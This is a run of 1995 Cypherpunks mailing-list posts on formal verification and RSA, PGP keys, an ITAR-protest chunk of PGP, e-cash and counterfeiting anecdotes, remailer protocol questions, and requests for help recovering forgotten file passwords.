is cleary the way to go. This is an important _feature_ that will enable
some truly complex services as the class libraries matures, not a bug.

JWS




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: solman@MIT.EDU
Date: Sat, 5 Aug 95 01:06:54 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: RSA has been proved correct
In-Reply-To: <ac470d240502100447cc@[205.199.118.202]>
Message-ID: <9508050806.AA22214@ua.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Tim quoth:

|> I was reading the logic programming/theorem proving chapter of my new
|> Russell and Norvig book on AI, and came across something I once knew about
|> but had forgotten: the Boyer-Moore theorem prover was applied to the RSA
|> algorithm and the correctness of it was verified. Correctness in the sense
|> of showing that outputs match formal specs, for all inputs.

|> The paper is: Boyer, R.S and Moore, J.S. (1984). Proof checking the RSA
|> public key encryption algorithm, "American Mathematical Monthly,"
|> 91(3):181-189.

Given the enormous difficulty of ensuring security in a world of
ubiquitous distributed computing, I'm as big a fan as any of formal
methods. But Tim's post hammers home the big fault of formal methods:
the possibility that people will come to rely upon them. I have
paranoid visions of people finally accepting formal methods in a decade
or so, and then becoming dependent on them... forgeting the enormous
potential for error that will always exist in such systems.

If somebody told me that intentionally letting a few violent criminals
free each year is a good idea because it would keep me on my toes, I
would think that person is an idiot. But I'm not entirely convinced that
it is a bad idea to avoid formal methods because they could breed
complacency.

Cheers,

JWS




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 5 Aug 95 05:12:19 PDT
To: cypherpunks@toad.com
Subject: JIL_ted
Message-ID: <199508051212.IAA26627@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-5-95. NYPaper:


   "Esoteric Wedge of Academia Is Roiled by Hunt for Bomber."

      Last October an agent from the Federal Bureau of
      Investigation showed up in New Orleans and subpoenaed
      the History of Science Society's membership records and
      questioned scholars for clues to the identity of the the
      Unabomber. That subpoena, and the disclosure that the
      F.B.I. believes that the bomber is immersed in the most
      radical interpretations of the history of science, has
      roiled the usually placid waters of the discipline. And
      across the country, professors have begun reconsidering
      old suspicions, acquaintances and tracts to help solve
      the crimes.                                    ROL_aid


   "Obscure Global Bank Moves Into the Light."

      In a small Swiss city sits an international organization
      so obscure and secretive that for many years visitors
      got lost looking for a small plaque next to an otherwise
      undistinguished doorway. Control of the institution, the
      Bank for International Settlements, lies with some of
      the world's most powerful and least visible men: the
      heads of 32 central banks, officials able to shift
      billions of dollars and alter the course of economies at
      the stroke of a pen. Now, however, the bank is stepping
      out of the shadows a bit. Last September, the Federal
      Reserve, the United States' central bank, officially
      joined -- quietly and discreetly, of course.   DON_ask


   Buda-Pest: JIL_ted








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Sat, 5 Aug 95 05:24:27 PDT
To: nzook@bga.com (Nathan Zook)
Subject: There's a hole in your reasonoing
In-Reply-To: <Pine.3.89.9508042253.A3820-0100000@jake.bga.com>
Message-ID: <9508051223.AA22788@all.net>
MIME-Version: 1.0
Content-Type: text


> 
> 
> 
> On Thu, 3 Aug 1995, Nathan Loofbourrow wrote:
> 
> > Nathan Zook writes:
> >  > > And is there any way to build trusted system out of small, verifiable
> >  > > pieces?  Since the way they're connected could also be questioned, I
> >  > > suspect that when you put enough of them together it's just as bad as
> >  > > the case of a single, monolithic program.  But this isn't my area, so
> >  > > I don't know.
> >  > 
> >  > No.  This was essentially proved during the first third of this century.
...
> There is "active research".  Why is a mystry to me.  Godel's proof was 
> the completetion of several works.  On of the earily demonstrated that no 
> axiom system can be demonstrated to consistent by a weaker one.  Now the 
> "reasearch" in this area has consisted, in part, of translating 
> algorithms into statements in axiomatic systems.  The problem is that 
> either we cannot prove that these systems are consistent or they are 
> extremely limited in what they can do.  (In particular, recursion seems 
> to be anthema.)  But the word proof in the previous sentence has to be 
> taken with a grain of salt, because any axiom system that we use to prove 
> things about another axiom system has to be at least as complicated.

You hit the nail right on the head when you said:
	"or they are extremely limited in what they can do"

That's exactly the point.  We cannot prove programs with general purpose
functionality to be secure, becasue they are not.  But we may well be
able to prove a lot of security properties about programs that are not
general purpose.  For example, a Web server that only does GET and a
gopher server (not gopher plus) and a mail server may all fit the bill. 
An by coincidence, these are exactly the sorts of programs we want to be
able to prove security properties about.

> This is why the "not a Turing machine" assertion that the "Professor" is 
> important.  We know that Turing machine is undecidable, so if we want to 
> limit behavior, we can't have one.  BUT---we don't know that being a 
> Turing machine is equivalent to having "unpredictable" behavior.  
> Furthermore, a "proof" of the "not a Turing machine" assertion is going 
> to have to be done by--you guessed it--a computer.  And this computer is 
> running a program which definitely IS a Turing machine, if it is capable 
> of "proving" that other (suitably non-trivial) programs are not Turing 
> machines.

I think in the case of simple (i.e.  short and written for the purpose)
programs these proofs could reasonably be done by hand.  In fact, I
think we could create a theorum verifier that we could prove to only
verify true theorums as true.  Some theorums would never be proven one
way or the other, and others might be proven false, but some things,
particularly the ones we need to bootstrap the theorum proof technology
and things like the properties of a secure W3 server, could fit intop this
schema.

> Why must this be done on a computer?  Because the program under 
> consideration is thousands of machine instructions long.  And each 
> instruction will be translated into dozens of statements in the axiom 
> system.  So any attempted proof will be beyond human ability.

Not in the case of programs like the secure W3 and Gopher servers.  They
are under 100 lines long.  They are also designed to allow easy proof of
the desired properties. 

...
> So in each case, complex (in the technical sense) behavior is exhibited 
> by outlandishly simple systems.  Sohow the _interactions_ of these simple 
> and predictable systems become unpredictable.

But this is only true for certain classes of systems.  By designing other
classes of systems explicitly designed to not have those properties, we can
build up substantial systems with demonstrable protection properties.

> That is why I consider this to be a closed subject.

I thionk you should reopen your thinking.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 5 Aug 95 07:06:23 PDT
To: cypherpunks@toad.com
Subject: JAC_kio
Message-ID: <199508051406.KAA29361@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-6-95. NYPaper Book Review:


   "Spies Unlike Us: A history of French intelligence reveals
   a far more brutal approach than this country's."

      The aftermath of 1945 imposed an additional heavy burden
      on the French secret services. Political allegiances
      were exacerbated by the presence of a potential huge
      Communist fifth column in France. The rough lessons of
      the war led to a premium on "service action" operations
      of sabotage and assassination before which Britain's
      M.I.6 would have quailed. Mr. Porch sees the French
      secret services of today as still not having recovered
      from their politicization during World War II. During
      the gulf war, the humiliating realization was forced on
      the French Army that for intelligence it was totally
      dependent on American high technology.         SAL_mai


   "The Code War: How United States intelligence outsmarted
   Japan in World War II."

      He rightly sees the role of intelligence in the Pacific
      war not simply as a story of code-breaking successes.
      Rather, he writes, "the true achievements of
      intelligence in the Pacific war lie in the day-to-day
      accumulation of a fund of knowledge.... Cryptography,
      traffic analysis, aerial photography, prisoner
      interrogation, document capture and translation, and
      technical intelligence ... became pillars of an overall
      effort greater than the sum of its parts." He explains
      and describes this winning synergy of intelligence
      elements as well as, or better than, any previous
      author.                                        PIL_sal


   Jak/Ari: JAC_kio











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Marius" <Marius@doulosgeri.com>
Date: Sat, 5 Aug 95 07:59:18 PDT
To: Ray Arachelian <sunder@escape.com>
Subject: Re: building libraries
Message-ID: <199508051458.KAA00169@UnixServer>
MIME-Version: 1.0
Content-Type: text/plain



> Perhaps we could convince Bill Gates to bundle RSAREF with all his 
> Windoze OS's?  Ditto for Apple?
>

If Bill Gates handed out cryptography in Winoze he wouldn't be able 
to read the mail of all the lamerz who are going to be on the 
Mircrosoft network.  The poor rich bastard needs something to do in 
his free time other than fish in the pond that he had built under his 
house... 

Marius@doulosgeri.com

No opinions expressed by the author are shared by Doulos Productions,
The Third Wave, or any affiliated parties.  The author doesn't see why
not...  PGP public key follows...

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzAbrGoAAAEEAMiOnJQHn7aVRa0B0TjYdFXcR7SAqTg4+WCmA6iOiL03I9zX
GFWjFaW6Tdj5oymJeGP/YT8W1w151W530HZ3kF4OR15X/POv8OwQt8yOFnvhfhus
40KA4Fab3IHI7asIhEPVsgqhgqcHeTgyeqaSPubhVBizoQqvGmad4RK84ehhAAUR
tB5NYXJpdXMgPE1hcml1c0Bkb3Vsb3NnZXJpLmNvbT6JAJUDBRAwG82eZp3hErzh
6GEBAcY4A/9kteskcaUVbOsdcY/y/2tOzqBZFfBLPtq4PUGExZp5f3ir4RlpX9eb
HylWcnnYCTmnvW+7Hsx3rmS6sTRnyO4ajYVnpEMeuhTp9j4bswqj5f1xSz3RK7qJ
WRxf04rQVGv/PyFNK/pskY1BaBYyw9p1czdh8sPiLD0OeLEeKkZndA==
=Q7Hx
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@voxbox.norden1.com (Jim Grubs, W8GRT)
Date: Sat, 5 Aug 95 08:18:58 PDT
To: cypherpunks@toad.com
Subject: Re: Using MacPGP to revoke a key...
Message-ID: <889c0c2w165w@voxbox.norden1.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

"Robert A. Rosenberg" <hal9001@panix.com> writes:

> There is no need to revoke the old key - you just create a new key with
> both the old and new keys and send it to the KeyServer. The normal PGP
> "Default" when there are more than one key with the same Email Address is
> to use the last one (which would be last in the keyring as well as have the
> latest date).

Which is another good reason why one ought resist the itch to tinker with one
of those PGP keyring sorting programs.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: LIBERTY!! Use it or lose it!!

iQCVAwUBMCOKA974r4kaz3mVAQEKnAP8Cgjwj/9Lol1sXUepgAbh72R+cudYrWz1
F7BWC28as8SrTfYRPtcC3g2jDGbPBJu66FFfY8UjBo3vdMYbOIMxDCfoyqZmAxAg
QY0q8/DoZsJYXwwaxxNJD+3syreT6PyS52ML1GhYGfKrDIObnb4utDzliQ+NJDYT
YL87oqTT0b4=
=A8IV
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: merriman@arn.net (David K. Merriman)
Date: Sat, 5 Aug 95 20:03:29 PDT
To: cypherpunks@toad.com
Subject: Web page
Message-ID: <199508060310.WAA03341@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


I've *finally* gotten a Web page (Netscape optimized, Mosaic tolerant), and
included several links to crypto-related sites. Suggestions, feedback, and
comments welcome.

We now return you to your regularly scheduled flame war :-)

Dave Merriman
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Alan Pugh" <Alan Pugh@MAILSRV2.PCY.MCI.NET>
Date: Sat, 5 Aug 95 19:28:35 PDT
To: cypherpunks@toad.com
Subject: addressing
Message-ID: <01HTQAQQ0ATE8WX734@MAILSRV1.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


hello all,

while this message has zero cypherpunks content, i'm posting this
information request here because i think there is a good chance that
someone on this list can help me with my question.

a friend of mine who has an mcimail account is having trouble getting
messages to a person in the far east with an address that looks like 
this...

<FLAST+PERMATMS%Perigon@mcimail.com

the 'flast' represents her first initial and last name. 

i've never seen a "%" or "+" in an address before and am wondering
if anyone out there can tell me what they mean, or if they can be resolved 
to a typical net.address. 

thanks for your time.

amp
          *********************************************
          *          / Only God can see the whole     *
          *  O[%\%\%{<>===========================-   *
          *          \ Mandlebrot Set at Once!        *
          * amp                                       *
          * <0003701548@mcimail.com>                  *
          * <alan.pugh@internetmci.com>               *
          *********************************************
Key fingerprint =  A7 97 70 0F E2 5B 95 7C  DB 7C 2B BF 0F E1 69 1D




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: turner@telecheck.com
Date: Sat, 5 Aug 95 23:41:42 PDT
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: PC E-cash (NewsClip)
In-Reply-To: <v02120d01ac481ff41b9f@[199.0.65.105]>
Message-ID: <9508060639.AA11095@TeleCheck.com>
MIME-Version: 1.0
Content-Type: text/plain


> >Secret Service Says Student Used PC To Print Money
> 
> etc.
> 
> This reminds me of something which happened to me last week in a Burger King
> in Chelsea(MA), where the skipper now keeps the boat I grind winches on. I'm
> paying for my lunch and the cashier takes out a felt-tip pen and puts a 
> little mark on my $10 bill.  She tells me that if the pen-stroke turns yellow > instead of the black one she got with mine, the bill is counterfeit.  She 
> told me she got yellow mark on $10 bill once. Go figure.
> 

I'm suprised that they check, since most counterfeiters don't usually do bills
less than $20, due to the costs associated with printing high quality 
counterfeited bills.

> So now, we have a working miniumum competitive cost of on-line digital cash
> verification. The amortized cost of the ink it takes to verify a piece of
> paper cash. What? 20 cents worth of ink? .002 cents?
>

I remember seeing a documentry film on counterfeiting money (don't remeber
the title, sorry), and a few Wall Street Journal articles on the subject.  
Some high points:

  1.  	The U.S. dollar costs more than a dollar to print up, not counting
 	distribution.  The paperstock is made out of cotton.. blaa, blaa..
	Several times Congressmen have proposed doing away with one dollar
	bills, and replacing them with coins.  A lot of political flack,
	saying that vending machine people want it so they can knock up the
	price of a Coke to $1.00. 
  
  2.   The same company that supplies the U.S. Treasury with paper stock for
	printing, also supplies France and a few other countries; other 
 	countries have elaborate watermarks and multiple colors to make 
	counterfeiting more difficult.  Holograms were tested with U.S. dollars,
	but failed the dreaded "crumple" test wherein a dollar is placed in a
	steel tube and squashed by a neumatic press.
,  
  3. 	The U.S. currency is made of a very special color of ink.  They made
	the point that it is not green, and hard to duplicate (yeah...). 
	Secret Service was interviewed during the documentary.

  4.   The Central Intelligence Agency sometimes prints up foreign currency
	to devalue it; the Germans did the same thing in WWII and several
 	million dollars worth of English currency was found in a river 
	somewhere in Europe... (sorry if I'm vague..), near some mine shaft
	(open for public tours) where the Germans stored some stuff (art work?). 

On a related note, there is a company that makes a device which will verify
U.S. bills which is used in banks (mostly in the middle east).  CNN did a 
spot on this last year. 

> More fun with numbers, 
> Bob Hettinga
> 
> P.S. We just put in 12 volt power for the Mac. I also bought an inverter. 
>      Banana daquiris on the hook. Raise the cocktail flag!
> 

You sniffed the magic currency pen, in the interests of scientific discovery, 
right? :-)  

> 
> -----------------
> Robert Hettinga (rah@shipwright.com)
> Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 
> "Reality is not optional." --Thomas Sowell
> >>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sun, 6 Aug 95 04:28:22 PDT
To: cypherpunks@toad.com
Subject: Re: PC E-cash (NewsClip)
Message-ID: <v02120d00ac4a5731e174@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



>I'm suprised that they check, since most counterfeiters don't usually do bills
>less than $20, due to the costs associated with printing high quality
>counterfeited bills.

Not too surprising for Chelsea. This is the first city to go bankrupt in
the history of the United States. I think it's still in recievership...


Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 6 Aug 95 06:35:40 PDT
To: cypherpunks@toad.com
Subject: addressing
Message-ID: <199508061335.JAA25573@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by Alan.Pugh@MAILSRV2.PCY.MCI.NET ("Alan 
Pugh") on Sat, 05 Aug 10:24 PM


>a friend of mine who has an mcimail account is having 
>trouble getting  messages to a person in the far east 
>with an address that looks like this...
>
><FLAST+PERMATMS%Perigon@mcimail.com
>
>i've never seen a "%" or "+" in an address before and 
>am wondering  if anyone out there can tell me what they 
>mean, or if they can be resolved to a typical 
>net.address. 


   Alan,

   Below is a similarly formatted address here in NYC. It is
   heirarchical, from left: Angelic CU + hir Mad-Dog Dept %
   the Cruel Bastard Org @ Tel Mail Hell.

   <LinetH+aFCRCCOS%Forest_City_Ratner_Companies@mcimail.com>

   If your friend's CBO is like Forest City Ratner, a
   Trump-wanna-be developer pack of urban rabid-rat-infestors,
   then the system was probably set up by a
   do-anything-for-a-fee consultant to a paranoidal CEO who
   buys oddles of pseudo-technical gimmicks for corporate
   obfuscation as a means to pyramidially distance hirself
   from the lowly mite-interminators minimally-paid to
   meta-desecrate the hiroshima-scape.

   According to "LinetH," if you are to the left of a " + "
   you are " - " but hyper-visible to the cyclopian, leering
   "+"-sisadmin eager to catch caged animals using the sys for
   private mail (hey, Bear Stearns-mogul leeches, fail yer
   prostate/mammogram test, LH sez).

   Or so LH quietly e-pecks in PGP, having learned not to
   trust any of the hir-MFs. Shh, the "%"-admin is lurking
   fearfully just left of H@L-admin.












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lharrison@mhv.net (Lynne L. Harrison)
Date: Sun, 6 Aug 95 10:13:27 PDT
To: cypherpunks@toad.com
Subject: Re: pkzip cracking
Message-ID: <9508061713.AA25727@mhv.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 05:17 AM 8/2/95 UTC, an264373@anon.penet.fi wrote:
>
>Does anyone have a utility to crack password encrypted/protected zip 
>files?  Or an address to download one?  All replies / flames / 
>pointers appreciated.


Sauroth -

  Did you ever get a response and, if so, what was the answer?


Regards -
  Lynne

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMCT4GD5A4+Z4Wnt9AQEdGAP+Nne+hetfsjLPNjNeAoWOHCIe14lqWOm3
iXYE8ol7PCf/B0CypYYShkpzX9Y1+319veAPLe6nzHU95TQkEGffwEJpFrLt2IA8
k0azeeRJvEERTVCC+4WUWXvE9ugsAXBn755Eg4HW6lEu1qNp/K3zn4fWGuNLeFna
Wt+Co+O7iQ0=
=s0hA
-----END PGP SIGNATURE-----

********************************************************************
Lynne L. Harrison, Esq.
Poughkeepsie, New York
E-Mail:
lharrison@mhv.net
Lynne.Harrison@Execnet.com

"Say not, 'I have found the truth', but rather, 'I have found a truth.'"
                         - Kahlil Gibran from "The Prophet"
********************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jcaldwel@iquest.net (James Caldwell)
Date: Sun, 6 Aug 95 13:01:33 PDT
To: jya@pipeline.com (John Young)
Subject: Re: addressing
In-Reply-To: <199508061335.JAA25573@pipe2.nyc.pipeline.com>
Message-ID: <m0sfBnU-001eF8C@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text


John Young wrote:
> 

Gotta love the perspective John brings to something such as e-mail addresses.
;-)

 
> Responding to msg by Alan.Pugh@MAILSRV2.PCY.MCI.NET ("Alan 
> Pugh") on Sat, 05 Aug 10:24 PM

>    If your friend's CBO is like Forest City Ratner, a
>    Trump-wanna-be developer pack of urban rabid-rat-infestors,
>    then the system was probably set up by a
>    do-anything-for-a-fee consultant to a paranoidal CEO who
>    buys oddles of pseudo-technical gimmicks for corporate
>    obfuscation as a means to pyramidially distance hirself
>    from the lowly mite-interminators minimally-paid to
>    meta-desecrate the hiroshima

Lemme guess, you've read Stand on Zanzibar and liked the news reports?


-- 
So you may wonder -- "But what does that have to do with me?"  
Answer: I have locked horns with "The Devil", buddy boy, 
and compared to  him, you ain't sh**.
 Brian Francis Redman to Chip Berlet






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joey Grasty" <jgrasty@gate.net>
Date: Sun, 6 Aug 95 13:13:19 PDT
To: cypherpunks@toad.com
Subject: Questions about SMTP and NNTP
Message-ID: <199508062011.QAA28350@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


C-punks:

While working on the SMTP and NNTP clients for the WinSock remailer,
I have uncovered two questions I don't know the answer to.  Here they
are:

1.  When sending a message to the SMTP server, I use scenario 4 as
    shown in RFC821 as a basis for my client.  There seems to be a 
    huge security hole in SMTP.  I can use just about any name 
    when sending the VRFY command.  For example, I could connect to
    "sensemedia.com" and pretend to be "tcmay".  Is there something
    I'm missing here or is there really that big a security hole in
    SMTP?

2.  How do you do user authentication in NNTP?  There's nothing about
    it RFC977.  Is there a later RFC that describes how to do user
    authentication?  All of my newsreaders support this function, but
    I haven't been able to figure out how to do it.

Any help you can give me would be appreciated.

ObWinSock Remailer:  I have the POP3, NNTP and SMTP clients functional
now.  With luck, I'll have an alpha test version of the remailer in 
two or three weeks.

ObCypherPunks:  Is the list down?  I haven't heard a peep since about
noon.  I send a "who cypherpunks" to majordomo and received a quick 
reply which shows I'm still subscribed.  Any idea?

Regards,

--
Joey Grasty
jgrasty@gate.net [home -- encryption, privacy, RKBA and other hopeless causes]
jgrasty@pts.mot.com [work -- designing pagers]
"Anyone who considers arithmetical methods of producing random digits is,
of course, in a state of sin." -- John Von Neumann




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Sun, 6 Aug 95 16:27:06 PDT
To: Matt Miszewski <cypherpunks@toad.com
Subject: Re: MS Money password problem
Message-ID: <ac4a9e2500021004ad0d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:34 PM 8/21/95, Matt Miszewski wrote:
>We recently lost (ok fired) our office manager, but not before she put
>nifty passwords on all the MS Money data we had and now she has, of
>course, gone on a three week vacation.  I have all the relevant WP
>password retrieving mechanisms but not one for MS Money.
>
>Anyone with pointers or programs, your help would be greatly appreciated.

This, of course, is the rationale for the "key escrow" systems (as opposed
to the government-mandated "key escrow" proposals, which are not an
"escrow" sytem of this kind).

"Escrow" is sufficiently overloaded with real estate connotations that I
wish the industry would adopt a different term. Carl Ellison's "GAK" is
cute, but is hardly likely to ever be adopted widely.

(No, I'm not calling for another round of suggested names, just opining
that "key escrow" is a terrible name.)

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joe McGuckin <joe@ns.via.net>
Date: Sun, 6 Aug 95 18:38:56 PDT
To: cypherpunks@toad.com
Subject: Encrypted internet traffic to Singapore??
Message-ID: <199508070138.SAA12404@ns.via.net>
MIME-Version: 1.0
Content-Type: text/plain


A client of mine wishes to set up a connection to their
Singapore office using the internet rather than a dedicated 
leased line.

They would like to encrypt the data going between the branch
office in Singapore and the home office in California. 

I am considering using something like swIPe for this? Seem reasonable?
The data is not very secret, they merely wish to foil 'hacker' type
eavesdroppers.

Also, what are the legal ramifications? Can I get an export license 
for this? Is there an encryption method that doesn't require an
export license?  What laws does Singapore have on encryption?

Is swIPe legal? That is, are any patents being misappropriated by the
current version?  I see announcements on this list about DH and Public 
Key software being released. I would assume that these software tidbits 
are technically illegal for commercial use?

Thanks,

Joe




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Sun, 6 Aug 95 03:16:44 PDT
To: gnu@toad.com (John Gilmore)
Subject: Re: NRC Panel, Law Enforcement questions
In-Reply-To: <9508020134.AA07797@toad.com>
Message-ID: <199508061016.UAA14365@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


Hello cypherpunks@toad.com
  and John Gilmore <gnu@toad.com>

... [Questions] ...
> How many subpoenas for telephone billing records are made by Federal
... Eg.
> "50% fishing expedition, 22% the subject is in custody for a crime
> (break down by which crimes), 5% the subject is suspected of a crime
> (break down), 10% the subject is not suspected of a crime but there
> may be evidence of someone else's crime in their phone records".
...

What are the other 13% for?


Thanks for a realistic sample answer anyway :-)

Jiri
--
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Miszewski <crypto@midex.com>
Date: Sun, 6 Aug 95 12:24:16 PDT
To: cypherpunks@toad.com
Subject: MS Money password problem
Message-ID: <Pine.3.89.9508062007.A19303-0100000@shaq.midex.com>
MIME-Version: 1.0
Content-Type: text/plain


We recently lost (ok fired) our office manager, but not before she put 
nifty passwords on all the MS Money data we had and now she has, of 
course, gone on a three week vacation.  I have all the relevant WP 
password retrieving mechanisms but not one for MS Money.

Anyone with pointers or programs, your help would be greatly appreciated.

Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Sun, 6 Aug 95 18:51:07 PDT
To: solman@MIT.EDU
Subject: Re: RSA has been proved correct
In-Reply-To: <9508050806.AA22214@ua.MIT.EDU>
Message-ID: <Pine.3.89.9508061931.B8642-0100000@maria.bga.com>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 5 Aug 1995 solman@MIT.EDU wrote:

> Tim quoth:
> 
> |> I was reading the logic programming/theorem proving chapter of my new
> |> Russell and Norvig book on AI, and came across something I once knew about
> |> but had forgotten: the Boyer-Moore theorem prover was applied to the RSA
> |> algorithm and the correctness of it was verified. Correctness in the sense
> |> of showing that outputs match formal specs, for all inputs.
> 
> |> The paper is: Boyer, R.S and Moore, J.S. (1984). Proof checking the RSA
> |> public key encryption algorithm, "American Mathematical Monthly,"
> |> 91(3):181-189.
> 
> Given the enormous difficulty of ensuring security in a world of
> ubiquitous distributed computing, I'm as big a fan as any of formal
> methods. But Tim's post hammers home the big fault of formal methods:
> the possibility that people will come to rely upon them. I have
> paranoid visions of people finally accepting formal methods in a decade
> or so, and then becoming dependent on them... forgeting the enormous
> potential for error that will always exist in such systems.
> 
> If somebody told me that intentionally letting a few violent criminals
> free each year is a good idea because it would keep me on my toes, I
> would think that person is an idiot. But I'm not entirely convinced that
> it is a bad idea to avoid formal methods because they could breed
> complacency.
> 
> Cheers,
> 
> JWS

The problem is that these "formal methods" are themselves unproved and, 
in the general sense, unprovable.  Using a computer program to verify RSA 
is like using number theory to verify some proof in set theory--you may 
succede, but so what?  The RSA algorithm works because of some basic (and 
not quite so basic) facts of number theory.  Number theory is assumed in 
the design of computers, of processors, of operating systems, and of 
programs.

To put the question succinctly, would you trust a theorem "prover" to 
verify its own accuracy?


The RSA algorithm:

Select primes p and q  and an exponenet e, such that gcd(e,p-1) = 
gcd(e,q-1) = 1.  (In practice, we would want log_2(q) << e >> log_2(p).
Publish e and pq.  Find d_1, d_2 such that d_1 and d_2 are inverses of e 
in Z_p-1 and Z_q-1 respectively.  A message Y (from 0 to pq-1) is 
transformed into X = Y^e mod qp.  When you recieve a message X, let X_1 = 
X mod p and X_2 = X mod q.  Let Y_1 = X_1^d_1 mod p and Y_2 = X_2^d_2 mod 
q.  Use the Chinese Remainder Theorem to find Z (from 0 to pq-1) such 
that Z = Y_1 mod p1 and Z = Y_2 mod p2.

Theorem: Z = Y.
Pf:
Let p_1 = p and p_2 = q
a) Observe that in F_p_i, (Y^e)^d_i = Y^(e*d_i) = Y^(r*(p-1)+1) = 
        Y^((p-1)*r) * Y= (Y^(p-1))^r * Y = 1^r * Y = Y.

b)  There exist p,q,e triples.
  If we let the order of our selection be p,e,q then we observe that we are
  free in our selection of p, and that our selection of e is not very 
  constrained.  ((p-1/)2 +- 1 being obvious examples).  We then observe 
  than any arithmatic progression of integers which does not obviously 
  consist entirely of composites must contain an infinite number of 
  primes, and observe that the condition that gcd(q-1,e) = 1 defines just 
  such a progression.
  
c) The d's can be found
  See Euclid's Algorithm

c) Z_pq is the (ring) direct sum of Z_p and Z_q

QED

(Observe that the Chinese Remainder Theorem works on arbitrary ring direct 
sums.)


Why this excercise?  Because not _one_ of the cited theorems is modern.  
The only thing in this proof unknown to Fermat, Galios, Euclid, and the 
Middle Age Chinese is that bit about arithmatic progressions and primes, 
which may have been known to Fermat or Euclid.  If I am informed that a 
theorem "prover" has "verified" this theorem, then I am led to believe 
that the "prover" is not obviously broken.  My confidence (as an 
algorithm--this is a separate issue from decryption resistance) in RSA has 
_NOTHING_ to do with what some theorem "prover" may or may not have to 
say about it.  Such statements serve only to inform that these "provers" 
are broken (if they don't like it), or that they concievably do "verify" 
proofs (if they do).

OTOH, the theorems and axiom systems corresponding to these theorem 
"provers" are very complex, and quite subtle at points.  Plug in the 
lastest attempt at Fermat's Last (as opposed to his Little) theorem, and 
tell me if its good.  Do the classification of finite groups.  I know, 
there is a 125-page attempt at the Poincare' conjecture.  Try it.  If 
